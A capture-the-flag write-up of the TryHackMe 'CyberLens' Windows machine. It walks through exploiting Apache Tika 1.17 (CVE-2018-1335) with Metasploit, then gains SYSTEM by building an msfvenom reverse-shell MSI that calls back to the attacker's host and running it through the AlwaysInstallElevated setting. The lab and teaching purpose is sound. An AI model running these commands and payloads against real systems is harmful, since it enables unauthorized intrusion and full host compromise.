Post

CyberLens Writeup - TryHackMe

CyberLens is an easy level boot2root machine available on TryHackMe. This box is a Windows machine with a vulnerable web application. The goal is to exploit the web application to get a reverse shell and then escalate privileges to get the root flag.

Enumeration

As I always do, start with a port scan to identify the open ports and services running on the target machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
PORT      STATE SERVICE       REASON  VERSION
80/tcp    open  http          syn-ack Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?    syn-ack
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack Microsoft Windows RPC
49677/tcp open  msrpc         syn-ack Microsoft Windows RPC
61777/tcp open  http          syn-ack Jetty 8.y.z-SNAPSHOT
| http-methods: 
|   Supported Methods: POST GET PUT OPTIONS HEAD
|_  Potentially risky methods: PUT
|_http-title: Welcome to the Apache Tika 1.17 Server
|_http-cors: HEAD GET
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-26T13:24:02
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 3604/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 39742/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 15440/udp): CLEAN (Failed to receive data)
|   Check 4 (port 45802/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

From the scan, we can see that the target machine is running a web server on port 80 and 61777. Let’s start by visiting the web server on port 80.

Web Application

CyberLens

It’s a simple metadata extraction tool. We can upload a file and it will extract the metadata from the file. However, that’s not useful for us. So that’s why I peeked at the other web server running on port 61777.

Apache Tika

Apache Tika

Apache Tika version 1.17 is running on this server. It’s vulnerable to CVE-2018-1335, which allows remote code execution. Luckily, there is a Metasploit module available for this vulnerability.

Exploitation

Metasploit

Once the exploit is run, I got a meterpreter shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf6 exploit(windows/http/apache_tika_jp2_jscript) > run

[*] Started reverse TCP handler on 10.9.1.193:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -   8.10% done (7999/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  16.19% done (15998/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  24.29% done (23997/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  32.39% done (31996/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  40.48% done (39995/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  48.58% done (47994/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  56.67% done (55993/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  64.77% done (63992/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  72.87% done (71991/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  80.96% done (79990/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  89.06% done (87989/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress -  97.16% done (95988/98798 bytes)
[*] Sending PUT request to 10.10.135.152:61777/meta
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Sending stage (176198 bytes) to 10.10.135.152
[*] Meterpreter session 1 opened (10.9.1.193:4444 -> 10.10.135.152:49862) at 2024-05-26 09:56:41 -0400

meterpreter > 

Privilege Escalation

After getting the meterpreter shell, I downloaded PrivescCheck.ps1 to automate the privilege escalation process.

1
2
3
4
5
meterpreter > cd %temp%
meterpreter > upload PrivescCheck.ps1
[*] Uploading  : /home/kali/Desktop/PrivescCheck.ps1 -> PrivescCheck.ps1
[*] Uploaded 161.87 KiB of 161.87 KiB (100.0%): /home/kali/Desktop/PrivescCheck.ps1 -> PrivescCheck.ps1
[*] Completed  : /home/kali/Desktop/PrivescCheck.ps1 -> PrivescCheck.ps1

After I run the script, I found that it’s likely to escalate privileges using the AlwaysInstallElevated registry key.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
????????????????????????????????????????????????????????????????
?                 ~~~ PrivescCheck Summary ~~~                 ?
????????????????????????????????????????????????????????????????
 TA0003 - Persistence
 - UEFI & Secure Boot ▒ Low
 TA0004 - Privilege Escalation
 - AlwaysInstallElevated ▒ High
 - Driver co-installers ▒ Low
 - Latest updates installed ▒ Medium
 TA0006 - Credential Access
 - LSA Protection ▒ Low
 - Credential Guard ▒ Low
 TA0008 - Lateral Movement
 - UAC settings ▒ Low
 - LAPS ▒ Medium

AlwaysInstallElevated allows non-administrative users to install .msi packages with elevated privileges.

I created a suspicious .msi package locally:

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.1.193 LPORT=8282 -a x64 --platform Windows -f msi -o evil.msi
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: evil.msi

Then I uploaded the evil.msi file to the target machine and executed it.

1
2
3
4
5
6
7
meterpreter > shell
Process 3940 created.
Channel 6 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\CYBERL~1\AppData\Local\Temp\1>msiexec /quiet /qn /i evil.msi

After executing the .msi package, I got a reverse shell as NT AUTHORITY\SYSTEM.

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nlvp 8282
listening on [any] 8282 ...
connect to [10.9.1.193] from (UNKNOWN) [10.10.68.65] 49843
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

What a fun box! I hope you enjoyed the writeup. Thanks for reading!

This post is licensed under CC BY 4.0 by the author.